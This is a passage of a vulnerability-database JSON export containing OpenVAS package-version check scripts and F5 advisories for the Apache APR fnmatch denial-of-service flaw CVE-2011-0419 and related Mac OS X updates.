"2018-11-16T00:00:00", "id": "OPENVAS:1361412562310831404", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831404", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for apr MDVSA-2011:095 (apr)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.mandriva.com/security-announce/2011-05/msg00019.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831404\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-23 16:55:31 +0200 (Mon, 23 May 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"MDVSA\", value:\"2011:095\");\n script_cve_id(\"CVE-2011-0419\", \"CVE-2011-1928\");\n script_name(\"Mandriva Update for apr MDVSA-2011:095 (apr)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apr'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", re:\"ssh/login/release=MNDK_(mes5|2010\\.1|2009\\.0)\");\n script_tag(name:\"affected\", value:\"apr on Mandriva Linux 2009.0,\n Mandriva Linux 2009.0/X86_64,\n Mandriva Linux 2010.1,\n Mandriva Linux 2010.1/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\");\n script_tag(name:\"insight\", value:\"It was discovered that the fix for CVE-2011-0419 under certain\n conditions could cause a denial-of-service (DoS) attack in APR\n (CVE-2011-1928).\n\n Packages for 2009.0 are provided as of the Extended Maintenance\n Program. The updated packages have been patched to correct this issue.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://store.mandriva.com/product_info.php?cPath=149&amp;products_id=490\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libapr1\", rpm:\"libapr1~1.3.3~2.3mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libapr-devel\", rpm:\"libapr-devel~1.3.3~2.3mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.3.3~2.3mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64apr1\", rpm:\"lib64apr1~1.3.3~2.3mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64apr-devel\", rpm:\"lib64apr-devel~1.3.3~2.3mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libapr1\", rpm:\"libapr1~1.4.2~1.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libapr-devel\", rpm:\"libapr-devel~1.4.2~1.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.4.2~1.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64apr1\", rpm:\"lib64apr1~1.4.2~1.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64apr-devel\", rpm:\"lib64apr-devel~1.4.2~1.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libapr1\", rpm:\"libapr1~1.3.3~2.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libapr-devel\", rpm:\"libapr-devel~1.3.3~2.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.3.3~2.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64apr1\", rpm:\"lib64apr1~1.3.3~2.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64apr-devel\", rpm:\"lib64apr-devel~1.3.3~2.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:35:56", "description": "Gentoo Linux Local Security Checks GLSA 201405-24", "cvss3": {}, "published": "2015-09-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201405-24", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2012-0840", "CVE-2010-1623", "CVE-2011-1928"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310121199", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121199", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201405-24.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121199\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:27:15 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201405-24\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Apache Portable Runtime and APR Utility Library. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201405-24\");\n script_cve_id(\"CVE-2010-1623\", \"CVE-2011-0419\", \"CVE-2011-1928\", \"CVE-2012-0840\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201405-24\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"dev-libs/apr\", unaffected: make_list(\"ge 1.4.8-r1\"), vulnerable: make_list(\"lt 1.4.8-r1\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-libs/apr-util\", unaffected: make_list(\"ge 1.3.10\"), vulnerable: make_list(\"lt 1.3.10\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-27T19:22:38", "description": "This host is missing an important security update according to\n Mac OS X 10.6.8 Update/Mac OS X Security Update 2011-006.", "cvss3": {}, "published": "2011-10-20T00:00:00", "type": "openvas", "title": "Mac OS X v10.6.8 Multiple Vulnerabilities (2011-006)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0187", "CVE-2011-0421", "CVE-2011-1467", "CVE-2011-1153", "CVE-2011-1471", "CVE-2011-3221", "CVE-2011-3227", "CVE-2011-0259", "CVE-2011-3216", "CVE-2011-3246", "CVE-2011-1466", "CVE-2011-3435", "CVE-2011-3222", "CVE-2011-0229", "CVE-2011-1521", "CVE-2010-4172", "CVE-2011-0419", "CVE-2011-1092", "CVE-2011-0252", "CVE-2011-3223", "CVE-2011-0185", "CVE-2011-1755", "CVE-2011-3220", "CVE-2011-0224", "CVE-2011-2464", "CVE-2010-4645", "CVE-2011-3214", "CVE-2010-3436", "CVE-2010-1157", "CVE-2011-0013", "CVE-2011-0708", "CVE-2011-3228", "CVE-2011-0249", "CVE-2011-0231", "CVE-2011-0534", "CVE-2011-3437", "CVE-2011-2691", "CVE-2011-1468", "CVE-2011-0420", "CVE-2010-2089", "CVE-2011-3224", "CVE-2011-0226", "CVE-2011-1470", "CVE-2011-3192", "CVE-2011-3219", "CVE-2011-3436", "CVE-2011-3225", "CVE-2011-3215", "CVE-2011-0260", "CVE-2011-2692", "CVE-2010-2227", "CVE-2011-1469", "CVE-2011-3218", "CVE-2010-3614", "CVE-2011-3213", "CVE-2010-3718", "CVE-2011-0250", "CVE-2011-3217", "CVE-2010-3613", "CVE-2010-1634", "CVE-2010-0097", "CVE-2011-0251", "CVE-2011-0707", "CVE-2011-0230", "CVE-2011-3226", "CVE-2011-2690", "CVE-2011-0411", "CVE-2011-3212", "CVE-2009-4022", "CVE-2011-1910"], "modified": "2020-04-23T00:00:00", "id": "OPENVAS:1361412562310802336", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802336", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mac OS X v10.6.8 Multiple Vulnerabilities (2011-006)\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802336\");\n script_version(\"2020-04-23T08:43:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-23 08:43:39 +0000 (Thu, 23 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-10-20 08:43:23 +0200 (Thu, 20 Oct 2011)\");\n script_cve_id(\"CVE-2011-0419\", \"CVE-2011-3192\", \"CVE-2011-0185\", \"CVE-2011-3437\",\n \"CVE-2011-0229\", \"CVE-2011-0230\", \"CVE-2011-1910\", \"CVE-2011-2464\",\n \"CVE-2009-4022\", \"CVE-2010-0097\", \"CVE-2010-3613\", \"CVE-2010-3614\",\n \"CVE-2011-0231\", \"CVE-2011-3246\", \"CVE-2011-0259\", \"CVE-2011-0187\",\n \"CVE-2011-0224\", \"CVE-2011-0260\", \"CVE-2011-3212\", \"CVE-2011-3213\",\n \"CVE-2011-3214\", \"CVE-2011-1755\", \"CVE-2011-3215\", \"CVE-2011-3216\",\n \"CVE-2011-3227\", \"CVE-2011-0707\", \"CVE-2011-3217\", \"CVE-2011-3435\",\n \"CVE-2010-3436\", \"CVE-2010-4645\", \"CVE-2011-0420\", \"CVE-2011-0421\",\n \"CVE-2011-0708\", \"CVE-2011-1092\", \"CVE-2011-1153\", \"CVE-2011-1466\",\n \"CVE-2011-1467\", \"CVE-2011-1468\", \"CVE-2011-1469\", \"CVE-2011-1470\",\n \"CVE-2011-1471\", \"CVE-2011-0411\", \"CVE-2010-1634\", \"CVE-2010-2089\",\n \"CVE-2011-1521\", \"CVE-2011-3228\", \"CVE-2011-0249\", \"CVE-2011-0250\",\n \"CVE-2011-0251\", \"CVE-2011-0252\", \"CVE-2011-3218\", \"CVE-2011-3219\",\n \"CVE-2011-3220\", \"CVE-2011-3221\", \"CVE-2011-3222\", \"CVE-2011-3223\",\n \"CVE-2011-3225\", \"CVE-2010-1157\", \"CVE-2010-2227\", \"CVE-2010-3718\",\n \"CVE-2010-4172\", \"CVE-2011-0013\", \"CVE-2011-0534\", \"CVE-2011-3224\",\n \"CVE-2011-2690\", \"CVE-2011-2691\", \"CVE-2011-2692\", \"CVE-2011-3436\",\n \"CVE-2011-3226\", \"CVE-2011-0226\");\n script_bugtraq_id(47820, 49303, 50092, 50112, 50091, 50099, 48007, 48566, 37118,\n 37865, 45133, 45137, 50098, 50115, 50067, 46992, 50095, 50120,\n 50109, 50116, 50111, 48250, 50113, 50121, 50129, 46464, 50117,\n 50114, 50146, 50153, 48619, 48660, 48618, 44723, 45668, 46429,\n 46354, 46365, 46786, 46854, 46967, 46968, 46977, 46970, 46969,\n 46975, 46767, 40370, 40863, 47024, 50127, 48993, 49038, 50122,\n 50068, 50130, 50131, 50100, 50101, 50144, 39635, 41544, 46177,\n 45015, 46174, 46164, 50150);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Mac OS X v10.6.8 Multiple Vulnerabilities (2011-006)\");\n script_xref(name:\"URL\", value:\"http://support.apple.com/kb/HT1222\");\n script_xref(name:\"URL\", value:\"http://support.apple.com/kb/HT5000\");\n script_xref(name:\"URL\", value:\"http://support.apple.com/kb/HT5002\");\n script_xref(name:\"URL\", value:\"http://lists.apple.com/archives/security-announce//2011//Oct//msg00003.html\");\n\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.6\\.8\");\n script_tag(name:\"impact\", value:\"Successful exploitation could allow attackers to execute arbitrary code in\n the context of the browser, inject scripts, bypass certain security\n restrictions or cause a denial of service condition.\");\n script_tag(name:\"affected\", value:\"Apache, Application Firewall, ATS, BIND, Certificate Trust Policy, CFNetwork,\n CoreFoundation, CoreMedia, CoreProcesses, CoreStorage, File Systems,\n iChat Server, IOGraphics, Kernel, libsecurity, Mailman, MediaKit,\n Open Directory, PHP, postfix, python, QuickTime, SMB File Server, Tomcat,\n User Documentation, Web Server and X11.\");\n script_tag(name:\"insight\", value:\"Please see the references for more information on the vulnerabilities.\");\n script_tag(name:\"solution\", value:\"Run Mac Updates and update the Security Update 2011-006\");\n script_tag(name:\"summary\", value:\"This host is missing an important security update according to\n Mac OS X 10.6.8 Update/Mac OS X Security Update 2011-006.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"pkg-lib-macosx.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer)\n exit(0);\n\nif(\"Mac OS X\" >< osName)\n{\n if(version_is_equal(version:osVer, test_version:\"10.6.8\"))\n {\n if(isosxpkgvuln(fixed:\"com.apple.pkg.update.security.\", diff:\"2011.006\"))\n {\n report = report_fixed_ver(installed_version:osVer, vulnerable_range:\"Equal to 10.6.8\");\n security_message(port:0, data:report);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-09-04T14:19:54", "description": "This host is missing an important security update according to\n Mac OS X 10.6.8 Update/Mac OS X Security Update 2011-006.", "cvss3": {}, "published": "2011-10-20T00:00:00", "type": "openvas", "title": "Mac OS X v10.6.8 Multiple Vulnerabilities (2011-006)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0187", "CVE-2011-0421", "CVE-2011-1467", "CVE-2011-1153", "CVE-2011-1471", "CVE-2011-3221", "CVE-2011-3227", "CVE-2011-0259", "CVE-2011-3216", "CVE-2011-3246", "CVE-2011-1466", "CVE-2011-3435", "CVE-2011-3222", "CVE-2011-0229", "CVE-2011-1521", "CVE-2010-4172", "CVE-2011-0419", "CVE-2011-1092", "CVE-2011-0252", "CVE-2011-3223", "CVE-2011-0185", "CVE-2011-1755", "CVE-2011-3220", "CVE-2011-0224", "CVE-2011-2464", "CVE-2010-4645", "CVE-2011-3214", "CVE-2010-3436", "CVE-2010-1157", "CVE-2011-0013", "CVE-2011-0708", "CVE-2011-3228", "CVE-2011-0249", "CVE-2011-0231", "CVE-2011-0534", "CVE-2011-3437", "CVE-2011-2691", "CVE-2011-1468", "CVE-2011-0420", "CVE-2010-2089", "CVE-2011-3224", "CVE-2011-0226", "CVE-2011-1470", "CVE-2011-3192", "CVE-2011-3219", "CVE-2011-3436", "CVE-2011-3225", "CVE-2011-3215", "CVE-2011-0260", "CVE-2011-2692", "CVE-2010-2227", "CVE-2011-1469", "CVE-2011-3218", "CVE-2010-3614", "CVE-2011-3213", "CVE-2010-3718", "CVE-2011-0250", "CVE-2011-3217", "CVE-2010-3613", "CVE-2010-1634", "CVE-2010-0097", "CVE-2011-0251", "CVE-2011-0707", "CVE-2011-0230", "CVE-2011-3226", "CVE-2011-2690", "CVE-2011-0411", "CVE-2011-3212", "CVE-2009-4022", "CVE-2011-1910"], "modified": "2017-08-31T00:00:00", "id": "OPENVAS:802336", "href": "http://plugins.openvas.org/nasl.php?oid=802336", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_macosx_su11-006.nasl 7029 2017-08-31 11:51:40Z teissa $\n#\n# Mac OS X v10.6.8 Multiple Vulnerabilities (2011-006)\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow attackers to execute arbitrary code in\n the context of the browser, inject scripts, bypass certain security\n restrictions or cause a denial of service condition.\n Impact Level: System/Application\";\ntag_affected = \"Apache, Application Firewall, ATS, BIND, Certificate Trust Policy, CFNetwork,\n CoreFoundation, CoreMedia, CoreProcesses, CoreStorage, File Systems,\n iChat Server, IOGraphics, Kernel, libsecurity, Mailman, MediaKit,\n Open Directory, PHP, postfix, python, QuickTime, SMB File Server, Tomcat,\n User Documentation, Web Server and X11.\";\ntag_insight = \"For more information on the vulnerabilities refer to the links below.\";\ntag_solution = \"Run Mac Updates and update the Security Update 2011-006\n For updates refer to http://support.apple.com/kb/HT1222\";\ntag_summary = \"This host is missing an important security update according to\n Mac OS X 10.6.8 Update/Mac OS X Security Update 2011-006.\";\n\nif(description)\n{\n script_id(802336);\n script_version(\"$Revision: 7029 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-08-31 13:51:40 +0200 (Thu, 31 Aug 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-10-20 08:43:23 +0200 (Thu, 20 Oct 2011)\");\n script_cve_id(\"CVE-2011-0419\", \"CVE-2011-3192\", \"CVE-2011-0185\", \"CVE-2011-3437\",\n \"CVE-2011-0229\", \"CVE-2011-0230\", \"CVE-2011-1910\", \"CVE-2011-2464\",\n \"CVE-2009-4022\", \"CVE-2010-0097\", \"CVE-2010-3613\", \"CVE-2010-3614\",\n \"CVE-2011-0231\", \"CVE-2011-3246\", \"CVE-2011-0259\", \"CVE-2011-0187\",\n \"CVE-2011-0224\", \"CVE-2011-0260\", \"CVE-2011-3212\", \"CVE-2011-3213\",\n \"CVE-2011-3214\", \"CVE-2011-1755\", \"CVE-2011-3215\", \"CVE-2011-3216\",\n \"CVE-2011-3227\", \"CVE-2011-0707\", \"CVE-2011-3217\", \"CVE-2011-3435\",\n \"CVE-2010-3436\", \"CVE-2010-4645\", \"CVE-2011-0420\", \"CVE-2011-0421\",\n \"CVE-2011-0708\", \"CVE-2011-1092\", \"CVE-2011-1153\", \"CVE-2011-1466\",\n \"CVE-2011-1467\", \"CVE-2011-1468\", \"CVE-2011-1469\", \"CVE-2011-1470\",\n \"CVE-2011-1471\", \"CVE-2011-0411\", \"CVE-2010-1634\", \"CVE-2010-2089\",\n \"CVE-2011-1521\", \"CVE-2011-3228\", \"CVE-2011-0249\", \"CVE-2011-0250\",\n \"CVE-2011-0251\", \"CVE-2011-0252\", \"CVE-2011-3218\", \"CVE-2011-3219\",\n \"CVE-2011-3220\", \"CVE-2011-3221\", \"CVE-2011-3222\", \"CVE-2011-3223\",\n \"CVE-2011-3225\", \"CVE-2010-1157\", \"CVE-2010-2227\", \"CVE-2010-3718\",\n \"CVE-2010-4172\", \"CVE-2011-0013\", \"CVE-2011-0534\", \"CVE-2011-3224\",\n \"CVE-2011-2690\", \"CVE-2011-2691\", \"CVE-2011-2692\", \"CVE-2011-3436\",\n \"CVE-2011-3226\", \"CVE-2011-0226\");\n script_bugtraq_id(47820, 49303, 50092, 50112, 50091, 50099, 48007, 48566, 37118,\n 37865, 45133, 45137, 50098, 50115, 50067, 46992, 50095, 50120,\n 50109, 50116, 50111, 48250, 50113, 50121, 50129, 46464, 50117,\n 50114, 50146, 50153, 48619, 48660, 48618, 44723, 45668, 46429,\n 46354, 46365, 46786, 46854, 46967, 46968, 46977, 46970, 46969,\n 46975, 46767, 40370, 40863, 47024, 50127, 48993, 49038, 50122,\n 50068, 50130, 50131, 50100, 50101, 50144, 39635, 41544, 46177,\n 45015, 46174, 46164, 50150);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Mac OS X v10.6.8 Multiple Vulnerabilities (2011-006)\");\n script_xref(name : \"URL\" , value : \"http://support.apple.com/kb/HT1222\");\n script_xref(name : \"URL\" , value : \"http://support.apple.com/kb/HT5000\");\n script_xref(name : \"URL\" , value : \"http://support.apple.com/kb/HT5002\");\n script_xref(name : \"URL\" , value : \"http://lists.apple.com/archives/security-announce//2011//Oct//msg00003.html\");\n\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\ninclude(\"pkg-lib-macosx.inc\");\n\n## Get the OS name\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName){\n exit (0);\n}\n\n## Get the OS Version\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer){\n exit(0);\n}\n\n## Check for the Mac OS X and Mac OS X Server\nif(\"Mac OS X\" >< osName)\n{\n ## Check the affected OS versions\n if(version_is_equal(version:osVer, test_version:\"10.6.8\"))\n {\n ## Check for the security update 2011.006\n if(isosxpkgvuln(fixed:\"com.apple.pkg.update.security.\", diff:\"2011.006\"))\n {\n security_message(0);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "f5": [{"lastseen": "2021-06-08T18:45:10", "description": "Recommended Action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the table does not list any version in the column, then no upgrade candidate currently exists.\n\nBIG-IP and Enterprise Manager\n\nTo mitigate this vulnerability, F5 recommends that you expose the management access only on trusted networks.\n\nARX \n\n\nTo mitigate this vulnerability, do not enable the API functionality. \n\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x)\n * SOL10025: Managing BIG-IP product hotfixes (10.x)\n * SOL9502: BIG-IP hotfix matrix\n * SOL12766: ARX hotfix matrix\n", "cvss3": {}, "published": "2014-12-18T00:00:00", "type": "f5", "title": "SOL15920 - Apache vulnerability CVE-2011-0419", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419"], "modified": "2014-12-18T00:00:00", "id": "SOL15920", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/900/sol15920.html", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2023-06-04T19:22:51", "description": " \n\n\nStack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in libc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle Solaris 10, and Android, allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd. ([CVE-2011-0419](<https://vulners.com/cve/CVE-2011-0419>)) \n\n\nImpact \n\n\nThis vulnerability may allow remote attackers to cause a denial-of-service (DoS) attack (CPU and memory consumption) on the BIG-IP Configuration utility and the ARX management API. \n\n", "cvss3": {}, "published": "2014-12-18T23:07:00", "type": "f5", "title": "Apache vulnerability CVE-2011-0419", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, 